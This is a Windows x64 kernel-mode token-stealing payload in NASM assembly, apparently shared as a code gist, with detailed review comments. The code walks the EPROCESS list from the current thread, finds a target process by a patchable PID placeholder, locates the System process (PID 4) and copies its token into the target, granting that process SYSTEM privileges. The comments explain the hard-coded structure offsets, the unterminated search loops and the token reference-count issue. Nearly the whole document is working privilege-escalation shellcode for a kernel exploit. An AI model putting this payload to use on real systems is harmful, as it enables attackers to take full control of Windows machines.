@xpn
Created January 1, 2018 23:31
[BITS 64]
;-----------------------------------------------------------------------
; Windows x64 kernel-mode token-stealing payload (NASM, Intel syntax).
;
; Executed in kernel context (it reads the KPRCB through GS), it walks the
; EPROCESS list starting from the current thread's process, locates a target
; process by PID, then locates PID 4 (System) and copies System's Token field
; into the target so the target runs with SYSTEM privileges.
;
; In:     nothing. The 0x41414141 immediate is a placeholder the exploit
;         overwrites with the PID of the process to elevate (e.g. cmd.exe).
; Out:    nothing. Memory side effect: [target EPROCESS + 0x358] is overwritten.
; Saved:  rax, rbx, rcx, rsi, rdi (pushed/popped). rsi/rdi are saved but never
;         used below, so the two pushes/pops are dead weight.
; Clobb:  RFLAGS — the cmp instructions change flags and there is no
;         pushfq/popfq, so the caller's flags are not preserved.
; Stack:  5 qwords of transient stack, balanced on exit; no red zone is used
;         (none is available in kernel code anyway).
;
; All structure offsets below are hard-coded for one specific Windows build.
; KTHREAD, EPROCESS and the Token offset move between builds, so verify each
; one against the target (e.g. `dt nt!_EPROCESS` / `dt nt!_KTHREAD` in WinDbg)
; before use. Field names in the comments are those the original author gave;
; treat them as the expected layout, not as something this listing proves.
;
; NOTE(review): neither search loop has a termination condition. If the
; patched PID never matches, the walk goes around the circular list forever
; and also dereferences the list head (which is not an EPROCESS) as if it
; were one — a wrong PID therefore means a hang or a crash, not a clean
; failure. A hardened version would remember the starting EPROCESS and stop
; when the walk returns to it.
;
; NOTE(review): the Token field is copied verbatim, low bits included. On
; Windows the Token pointer is an EX_FAST_REF whose low bits hold a reference
; count; copying them as-is (rather than masking and/or taking a reference)
; is known to be fragile — typically the target process should not be allowed
; to exit normally after the swap, or the count must be handled. Confirm
; against the target build.
;-----------------------------------------------------------------------
push rax
push rbx
push rcx
push rsi
push rdi
mov rax, [gs:0x180 + 0x8] ; rax = KPRCB.CurrentThread (gs:0x188); GS must point at the KPCR, i.e. kernel mode
mov rax, [rax + 0x220] ; rax = KTHREAD+0x220 ('Process', the owning EPROCESS per the original comment)
next_process:
cmp dword [rax + 0x2e0], 0x41414141 ; EPROCESS+0x2e0 == target PID? ('AAAA' is patched by the exploit; dword compare is enough for a PID)
je found_cmd_process
mov rax, [rax + 0x2e8] ; rax = ActiveProcessLinks.Flink (a LIST_ENTRY pointer, not an EPROCESS)
sub rax, 0x2e8 ; CONTAINING_RECORD: back from the LIST_ENTRY to the EPROCESS base
jmp next_process ; no exit path if the PID is never found (see header)
found_cmd_process:
mov rbx, rax ; rbx = target EPROCESS, kept across the second walk
find_system_process:
cmp dword [rax + 0x2e0], 0x00000004 ; EPROCESS.UniqueProcessId == 4 (System)?
je found_system_process
mov rax, [rax + 0x2e8] ; same list walk as above, continuing from the target
sub rax, 0x2e8
jmp find_system_process ; likewise unterminated
found_system_process:
mov rcx, [rax + 0x358] ; rcx = System EPROCESS+0x358 (Token, copied with its EX_FAST_REF low bits intact — see header)
mov [rbx+0x358], rcx ; target EPROCESS.Token = System token
pop rdi
pop rsi
pop rcx
pop rbx
pop rax
; return goes here — the exploit appends whatever transfers control back (ret / jmp / iretq depending on how the payload was entered)